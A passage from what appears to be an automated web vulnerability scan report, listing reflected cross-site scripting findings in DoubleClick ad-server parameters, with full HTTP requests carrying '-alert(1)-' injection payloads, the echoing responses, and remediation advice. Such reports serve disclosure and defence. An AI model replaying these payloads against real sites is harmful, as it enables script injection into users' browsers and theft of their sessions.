Connection: close
Cookie: id=c653243310000d9|2409535/850532/15008,189445/526157/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc;

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 7891
Cache-Control: no-cache
Pragma: no-cache
Date: Thu, 03 Feb 2011 16:08:53 GMT
Expires: Thu, 03 Feb 2011 16:08:53 GMT
Connection: close

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Wed Feb 02 15:24:09 EST 2011 -->\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
k\" href=\"http://ad.doubleclick.net/click%3Bh%3Dv8/3aa3/f/23c/%2a/k%3B234019457%3B1-0%3B0%3B57865897%3B2321-160/600%3B40155604/40173391/4%3B%3B%7Esscs%3D%3fhttp://googleads.g.doubleclick.net/aclk?sa=lb4c51'-alert(1)-'a046432a509&ai=B4dkh_tBKTeXpApv7lQey2KGoDp3vkP4B5YTfuyHAjbcBoPPbAhABGAEgqvaFGDgAUJCnm70BYMm-somQpNARoAHro6faA7IBDXd3dy5sb2NhbC5jb226AQoxNjB4NjAwX2FzyAEJ2gGsAWh0dHA6Ly93d3cubG9jYWwuY29tL2RhcnQvP2FnPVRydWUmcD1sb2Nt
...[SNIP]...

1.37. http://ad.doubleclick.net/adj/N5776.google.comOX2416/B5111410.16 [sz parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N5776.google.comOX2416/B5111410.16

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 95ce4"-alert(1)-"4bb60c57e4a was submitted in the sz parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N5776.google.comOX2416/B5111410.16;sz=160x600;click=http://googleads.g.doubleclick.net/aclk?sa=l95ce4"-alert(1)-"4bb60c57e4a&ai=B4dkh_tBKTeXpApv7lQey2KGoDp3vkP4B5YTfuyHAjbcBoPPbAhABGAEgqvaFGDgAUJCnm70BYMm-somQpNARoAHro6faA7IBDXd3dy5sb2NhbC5jb226AQoxNjB4NjAwX2FzyAEJ2gGsAWh0dHA6Ly93d3cubG9jYWwuY29tL2RhcnQvP2FnPVRydWUmcD1sb2NtLnNwJnBvcz0zJnQ9MyZzej0xNjB4NjAwJm9yZD0xMjk2NzQ4ODEyNjM4Jms9YmFua3MmbD1EYWxsYXMlMkMrVFgmY2F0PWNhdCUzRGZpbmFuY2lhbF9zZXJ2aWNlcyZ6b25lPWxvY20uc3AlMkZyZXRhaWxfYmFua3NfMTUwMjAxMDC4AhjIAoWZ-heoAwHRA_lxBfrEOYUM9QMAAADEyAQB&num=1&sig=AGiWqtx7G7yGna9z3i0aQ_yvMAMz89tx4Q&client=ca-pub-4103679352234073&adurl=;ord=1145778283?\ HTTP/1.1
Host: ad.doubleclick.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: id=c653243310000d9|2409535/850532/15008,189445/526157/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc;

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 7891
Cache-Control: no-cache
Pragma: no-cache
Date: Thu, 03 Feb 2011 16:08:53 GMT
Expires: Thu, 03 Feb 2011 16:08:53 GMT
Connection: close

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Wed Feb 02 15:24:09 EST 2011 -->\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
= escape("http://ad.doubleclick.net/click%3Bh%3Dv8/3aa3/f/23c/%2a/k%3B234019457%3B1-0%3B0%3B57865897%3B2321-160/600%3B40155604/40173391/4%3B%3B%7Esscs%3D%3fhttp://googleads.g.doubleclick.net/aclk?sa=l95ce4"-alert(1)-"4bb60c57e4a&ai=B4dkh_tBKTeXpApv7lQey2KGoDp3vkP4B5YTfuyHAjbcBoPPbAhABGAEgqvaFGDgAUJCnm70BYMm-somQpNARoAHro6faA7IBDXd3dy5sb2NhbC5jb226AQoxNjB4NjAwX2FzyAEJ2gGsAWh0dHA6Ly93d3cubG9jYWwuY29tL2RhcnQvP2FnPVRydWUmcD1sb2Nt
...[SNIP]...

1.38. http://ad.doubleclick.net/adj/N5776.google.comOX2416/B5111410.18 [adurl parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N5776.google.comOX2416/B5111410.18

Issue detail

The value of the adurl request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9d464"-alert(1)-"0d57c46e691 was submitted in the adurl parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N5776.google.comOX2416/B5111410.18;sz=300x250;click=http://googleads.g.doubleclick.net/aclk?sa=l&ai=BQahWStFKTfOlEJnPlQeJvtnTDp3vkP4BldLeuyHAjbcBgIWfAxABGAEgqvaFGDgAUJCnm70BYMm-somQpNARoAHro6faA7IBDXd3dy5sb2NhbC5jb226AQozMDB4MjUwX2FzyAEJ2gFqaHR0cDovL3d3dy5sb2NhbC5jb20vZGFydC8_YWc9VHJ1ZSZwPWxvY20ucHAmcG9zPTImdD0yJnN6PTMwMHgyNTAmb3JkPTEyOTY3NDg4NzAyNzMmaz1iYW5rcyZsPURhbGxhcyUyQytUWOABA7gCGMgChZn6F6gDAdED-XEF-sQ5hQz1AwAAAMTIBAE&num=1&sig=AGiWqtwDn9xa90_LyfQQgZfcngpD0pdWtw&client=ca-pub-4103679352234073&adurl=9d464"-alert(1)-"0d57c46e691 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2409535/850532/15008,189445/526157/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 7515
Cache-Control: no-cache
Pragma: no-cache
Date: Thu, 03 Feb 2011 16:06:25 GMT
Expires: Thu, 03 Feb 2011 16:06:25 GMT

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Wed Feb 02 15:27:23 EST 2011 -->\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
D0yJnN6PTMwMHgyNTAmb3JkPTEyOTY3NDg4NzAyNzMmaz1iYW5rcyZsPURhbGxhcyUyQytUWOABA7gCGMgChZn6F6gDAdED-XEF-sQ5hQz1AwAAAMTIBAE&num=1&sig=AGiWqtwDn9xa90_LyfQQgZfcngpD0pdWtw&client=ca-pub-4103679352234073&adurl=9d464"-alert(1)-"0d57c46e691https://www.ally.com/bank/interest-checking-account/index.html?CP=57865904;40155598");
var fscUrl = url;
var fscUrlClickTagFound = false;
var wmode = "opaque";
var bg = "";
var dcallowscriptaccess
...[SNIP]...

1.39. http://ad.doubleclick.net/adj/N5776.google.comOX2416/B5111410.18 [adurl parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N5776.google.comOX2416/B5111410.18

Issue detail

The value of the adurl request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c3e8b'-alert(1)-'ba15f59f95e was submitted in the adurl parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N5776.google.comOX2416/B5111410.18;sz=300x250;click=http://googleads.g.doubleclick.net/aclk?sa=l&ai=BQahWStFKTfOlEJnPlQeJvtnTDp3vkP4BldLeuyHAjbcBgIWfAxABGAEgqvaFGDgAUJCnm70BYMm-somQpNARoAHro6faA7IBDXd3dy5sb2NhbC5jb226AQozMDB4MjUwX2FzyAEJ2gFqaHR0cDovL3d3dy5sb2NhbC5jb20vZGFydC8_YWc9VHJ1ZSZwPWxvY20ucHAmcG9zPTImdD0yJnN6PTMwMHgyNTAmb3JkPTEyOTY3NDg4NzAyNzMmaz1iYW5rcyZsPURhbGxhcyUyQytUWOABA7gCGMgChZn6F6gDAdED-XEF-sQ5hQz1AwAAAMTIBAE&num=1&sig=AGiWqtwDn9xa90_LyfQQgZfcngpD0pdWtw&client=ca-pub-4103679352234073&adurl=c3e8b'-alert(1)-'ba15f59f95e HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2409535/850532/15008,189445/526157/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 7481
Cache-Control: no-cache
Pragma: no-cache
Date: Thu, 03 Feb 2011 16:06:29 GMT
Expires: Thu, 03 Feb 2011 16:06:29 GMT

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Wed Feb 02 16:39:48 EST 2011 -->\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
D0yJnN6PTMwMHgyNTAmb3JkPTEyOTY3NDg4NzAyNzMmaz1iYW5rcyZsPURhbGxhcyUyQytUWOABA7gCGMgChZn6F6gDAdED-XEF-sQ5hQz1AwAAAMTIBAE&num=1&sig=AGiWqtwDn9xa90_LyfQQgZfcngpD0pdWtw&client=ca-pub-4103679352234073&adurl=c3e8b'-alert(1)-'ba15f59f95ehttps://www.ally.com/bank/interest-checking-account/index.html?CP=57865904;39213496\">
...[SNIP]...

1.40. http://ad.doubleclick.net/adj/N5776.google.comOX2416/B5111410.18 [ai parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N5776.google.comOX2416/B5111410.18

Issue detail

The value of the ai request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload de8ab'-alert(1)-'2e90ecc46ed was submitted in the ai parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N5776.google.comOX2416/B5111410.18;sz=300x250;click=http://googleads.g.doubleclick.net/aclk?sa=l&ai=BQahWStFKTfOlEJnPlQeJvtnTDp3vkP4BldLeuyHAjbcBgIWfAxABGAEgqvaFGDgAUJCnm70BYMm-somQpNARoAHro6faA7IBDXd3dy5sb2NhbC5jb226AQozMDB4MjUwX2FzyAEJ2gFqaHR0cDovL3d3dy5sb2NhbC5jb20vZGFydC8_YWc9VHJ1ZSZwPWxvY20ucHAmcG9zPTImdD0yJnN6PTMwMHgyNTAmb3JkPTEyOTY3NDg4NzAyNzMmaz1iYW5rcyZsPURhbGxhcyUyQytUWOABA7gCGMgChZn6F6gDAdED-XEF-sQ5hQz1AwAAAMTIBAEde8ab'-alert(1)-'2e90ecc46ed&num=1&sig=AGiWqtwDn9xa90_LyfQQgZfcngpD0pdWtw&client=ca-pub-4103679352234073&adurl=;ord=1257048341? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2409535/850532/15008,189445/526157/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Thu, 03 Feb 2011 16:04:49 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7517

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Wed Feb 02 16:39:48 EST 2011 -->\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
UwX2FzyAEJ2gFqaHR0cDovL3d3dy5sb2NhbC5jb20vZGFydC8_YWc9VHJ1ZSZwPWxvY20ucHAmcG9zPTImdD0yJnN6PTMwMHgyNTAmb3JkPTEyOTY3NDg4NzAyNzMmaz1iYW5rcyZsPURhbGxhcyUyQytUWOABA7gCGMgChZn6F6gDAdED-XEF-sQ5hQz1AwAAAMTIBAEde8ab'-alert(1)-'2e90ecc46ed&num=1&sig=AGiWqtwDn9xa90_LyfQQgZfcngpD0pdWtw&client=ca-pub-4103679352234073&adurl=https%3a%2f%2fwww.ally.com/bank/interest-checking-account/index.html%3FCP%3D57865904%3B39213496\">
...[SNIP]...

1.41. http://ad.doubleclick.net/adj/N5776.google.comOX2416/B5111410.18 [ai parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N5776.google.comOX2416/B5111410.18

Issue detail

The value of the ai request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 62261"-alert(1)-"0f904a05a8a was submitted in the ai parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N5776.google.comOX2416/B5111410.18;sz=300x250;click=http://googleads.g.doubleclick.net/aclk?sa=l&ai=BQahWStFKTfOlEJnPlQeJvtnTDp3vkP4BldLeuyHAjbcBgIWfAxABGAEgqvaFGDgAUJCnm70BYMm-somQpNARoAHro6faA7IBDXd3dy5sb2NhbC5jb226AQozMDB4MjUwX2FzyAEJ2gFqaHR0cDovL3d3dy5sb2NhbC5jb20vZGFydC8_YWc9VHJ1ZSZwPWxvY20ucHAmcG9zPTImdD0yJnN6PTMwMHgyNTAmb3JkPTEyOTY3NDg4NzAyNzMmaz1iYW5rcyZsPURhbGxhcyUyQytUWOABA7gCGMgChZn6F6gDAdED-XEF-sQ5hQz1AwAAAMTIBAE62261"-alert(1)-"0f904a05a8a&num=1&sig=AGiWqtwDn9xa90_LyfQQgZfcngpD0pdWtw&client=ca-pub-4103679352234073&adurl=;ord=1257048341? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2409535/850532/15008,189445/526157/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Thu, 03 Feb 2011 16:04:45 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7551

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Wed Feb 02 15:27:23 EST 2011 -->\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
UwX2FzyAEJ2gFqaHR0cDovL3d3dy5sb2NhbC5jb20vZGFydC8_YWc9VHJ1ZSZwPWxvY20ucHAmcG9zPTImdD0yJnN6PTMwMHgyNTAmb3JkPTEyOTY3NDg4NzAyNzMmaz1iYW5rcyZsPURhbGxhcyUyQytUWOABA7gCGMgChZn6F6gDAdED-XEF-sQ5hQz1AwAAAMTIBAE62261"-alert(1)-"0f904a05a8a&num=1&sig=AGiWqtwDn9xa90_LyfQQgZfcngpD0pdWtw&client=ca-pub-4103679352234073&adurl=https%3a%2f%2fwww.ally.com/bank/interest-checking-account/index.html%3FCP%3D57865904%3B40155598");
var fscUrl = url;
...[SNIP]...

1.42. http://ad.doubleclick.net/adj/N5776.google.comOX2416/B5111410.18 [client parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N5776.google.comOX2416/B5111410.18

Issue detail

The value of the client request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 73cad'-alert(1)-'9a787db18eb was submitted in the client parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N5776.google.comOX2416/B5111410.18;sz=300x250;click=http://googleads.g.doubleclick.net/aclk?sa=l&ai=BQahWStFKTfOlEJnPlQeJvtnTDp3vkP4BldLeuyHAjbcBgIWfAxABGAEgqvaFGDgAUJCnm70BYMm-somQpNARoAHro6faA7IBDXd3dy5sb2NhbC5jb226AQozMDB4MjUwX2FzyAEJ2gFqaHR0cDovL3d3dy5sb2NhbC5jb20vZGFydC8_YWc9VHJ1ZSZwPWxvY20ucHAmcG9zPTImdD0yJnN6PTMwMHgyNTAmb3JkPTEyOTY3NDg4NzAyNzMmaz1iYW5rcyZsPURhbGxhcyUyQytUWOABA7gCGMgChZn6F6gDAdED-XEF-sQ5hQz1AwAAAMTIBAE&num=1&sig=AGiWqtwDn9xa90_LyfQQgZfcngpD0pdWtw&client=ca-pub-410367935223407373cad'-alert(1)-'9a787db18eb&adurl=;ord=1257048341? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2409535/850532/15008,189445/526157/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Thu, 03 Feb 2011 16:06:04 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7551

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Wed Feb 02 15:27:23 EST 2011 -->\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
9zPTImdD0yJnN6PTMwMHgyNTAmb3JkPTEyOTY3NDg4NzAyNzMmaz1iYW5rcyZsPURhbGxhcyUyQytUWOABA7gCGMgChZn6F6gDAdED-XEF-sQ5hQz1AwAAAMTIBAE&num=1&sig=AGiWqtwDn9xa90_LyfQQgZfcngpD0pdWtw&client=ca-pub-410367935223407373cad'-alert(1)-'9a787db18eb&adurl=https%3a%2f%2fwww.ally.com/bank/interest-checking-account/index.html%3FCP%3D57865904%3B40155598\">
...[SNIP]...

1.43. http://ad.doubleclick.net/adj/N5776.google.comOX2416/B5111410.18 [client parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N5776.google.comOX2416/B5111410.18

Issue detail

The value of the client request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 97bde"-alert(1)-"10744de2739 was submitted in the client parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N5776.google.comOX2416/B5111410.18;sz=300x250;click=http://googleads.g.doubleclick.net/aclk?sa=l&ai=BQahWStFKTfOlEJnPlQeJvtnTDp3vkP4BldLeuyHAjbcBgIWfAxABGAEgqvaFGDgAUJCnm70BYMm-somQpNARoAHro6faA7IBDXd3dy5sb2NhbC5jb226AQozMDB4MjUwX2FzyAEJ2gFqaHR0cDovL3d3dy5sb2NhbC5jb20vZGFydC8_YWc9VHJ1ZSZwPWxvY20ucHAmcG9zPTImdD0yJnN6PTMwMHgyNTAmb3JkPTEyOTY3NDg4NzAyNzMmaz1iYW5rcyZsPURhbGxhcyUyQytUWOABA7gCGMgChZn6F6gDAdED-XEF-sQ5hQz1AwAAAMTIBAE&num=1&sig=AGiWqtwDn9xa90_LyfQQgZfcngpD0pdWtw&client=ca-pub-410367935223407397bde"-alert(1)-"10744de2739&adurl=;ord=1257048341? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2409535/850532/15008,189445/526157/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Thu, 03 Feb 2011 16:06:00 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7517

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Wed Feb 02 16:39:48 EST 2011 -->\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
9zPTImdD0yJnN6PTMwMHgyNTAmb3JkPTEyOTY3NDg4NzAyNzMmaz1iYW5rcyZsPURhbGxhcyUyQytUWOABA7gCGMgChZn6F6gDAdED-XEF-sQ5hQz1AwAAAMTIBAE&num=1&sig=AGiWqtwDn9xa90_LyfQQgZfcngpD0pdWtw&client=ca-pub-410367935223407397bde"-alert(1)-"10744de2739&adurl=https%3a%2f%2fwww.ally.com/bank/interest-checking-account/index.html%3FCP%3D57865904%3B39213496");
var fscUrl = url;
var fscUrlClickTagFound = false;
var wmode = "opaque";
var bg = "";
var
...[SNIP]...

1.44. http://ad.doubleclick.net/adj/N5776.google.comOX2416/B5111410.18 [num parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N5776.google.comOX2416/B5111410.18

Issue detail

The value of the num request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c1b11"-alert(1)-"fc5636c00ac was submitted in the num parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N5776.google.comOX2416/B5111410.18;sz=300x250;click=http://googleads.g.doubleclick.net/aclk?sa=l&ai=BQahWStFKTfOlEJnPlQeJvtnTDp3vkP4BldLeuyHAjbcBgIWfAxABGAEgqvaFGDgAUJCnm70BYMm-somQpNARoAHro6faA7IBDXd3dy5sb2NhbC5jb226AQozMDB4MjUwX2FzyAEJ2gFqaHR0cDovL3d3dy5sb2NhbC5jb20vZGFydC8_YWc9VHJ1ZSZwPWxvY20ucHAmcG9zPTImdD0yJnN6PTMwMHgyNTAmb3JkPTEyOTY3NDg4NzAyNzMmaz1iYW5rcyZsPURhbGxhcyUyQytUWOABA7gCGMgChZn6F6gDAdED-XEF-sQ5hQz1AwAAAMTIBAE&num=1c1b11"-alert(1)-"fc5636c00ac&sig=AGiWqtwDn9xa90_LyfQQgZfcngpD0pdWtw&client=ca-pub-4103679352234073&adurl=;ord=1257048341? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2409535/850532/15008,189445/526157/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Thu, 03 Feb 2011 16:05:05 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7517

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Wed Feb 02 16:39:48 EST 2011 -->\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
yAEJ2gFqaHR0cDovL3d3dy5sb2NhbC5jb20vZGFydC8_YWc9VHJ1ZSZwPWxvY20ucHAmcG9zPTImdD0yJnN6PTMwMHgyNTAmb3JkPTEyOTY3NDg4NzAyNzMmaz1iYW5rcyZsPURhbGxhcyUyQytUWOABA7gCGMgChZn6F6gDAdED-XEF-sQ5hQz1AwAAAMTIBAE&num=1c1b11"-alert(1)-"fc5636c00ac&sig=AGiWqtwDn9xa90_LyfQQgZfcngpD0pdWtw&client=ca-pub-4103679352234073&adurl=https%3a%2f%2fwww.ally.com/bank/interest-checking-account/index.html%3FCP%3D57865904%3B39213496");
var fscUrl = url;
var f
...[SNIP]...

1.45. http://ad.doubleclick.net/adj/N5776.google.comOX2416/B5111410.18 [num parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N5776.google.comOX2416/B5111410.18

Issue detail

The value of the num request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2ccfa'-alert(1)-'eb4e71ababd was submitted in the num parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N5776.google.comOX2416/B5111410.18;sz=300x250;click=http://googleads.g.doubleclick.net/aclk?sa=l&ai=BQahWStFKTfOlEJnPlQeJvtnTDp3vkP4BldLeuyHAjbcBgIWfAxABGAEgqvaFGDgAUJCnm70BYMm-somQpNARoAHro6faA7IBDXd3dy5sb2NhbC5jb226AQozMDB4MjUwX2FzyAEJ2gFqaHR0cDovL3d3dy5sb2NhbC5jb20vZGFydC8_YWc9VHJ1ZSZwPWxvY20ucHAmcG9zPTImdD0yJnN6PTMwMHgyNTAmb3JkPTEyOTY3NDg4NzAyNzMmaz1iYW5rcyZsPURhbGxhcyUyQytUWOABA7gCGMgChZn6F6gDAdED-XEF-sQ5hQz1AwAAAMTIBAE&num=12ccfa'-alert(1)-'eb4e71ababd&sig=AGiWqtwDn9xa90_LyfQQgZfcngpD0pdWtw&client=ca-pub-4103679352234073&adurl=;ord=1257048341? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2409535/850532/15008,189445/526157/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Thu, 03 Feb 2011 16:05:10 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7551

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Wed Feb 02 15:27:23 EST 2011 -->\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
yAEJ2gFqaHR0cDovL3d3dy5sb2NhbC5jb20vZGFydC8_YWc9VHJ1ZSZwPWxvY20ucHAmcG9zPTImdD0yJnN6PTMwMHgyNTAmb3JkPTEyOTY3NDg4NzAyNzMmaz1iYW5rcyZsPURhbGxhcyUyQytUWOABA7gCGMgChZn6F6gDAdED-XEF-sQ5hQz1AwAAAMTIBAE&num=12ccfa'-alert(1)-'eb4e71ababd&sig=AGiWqtwDn9xa90_LyfQQgZfcngpD0pdWtw&client=ca-pub-4103679352234073&adurl=https%3a%2f%2fwww.ally.com/bank/interest-checking-account/index.html%3FCP%3D57865904%3B40155598\">
...[SNIP]...

1.46. http://ad.doubleclick.net/adj/N5776.google.comOX2416/B5111410.18 [sig parameter]  previous  next

Summary

Severity:   High
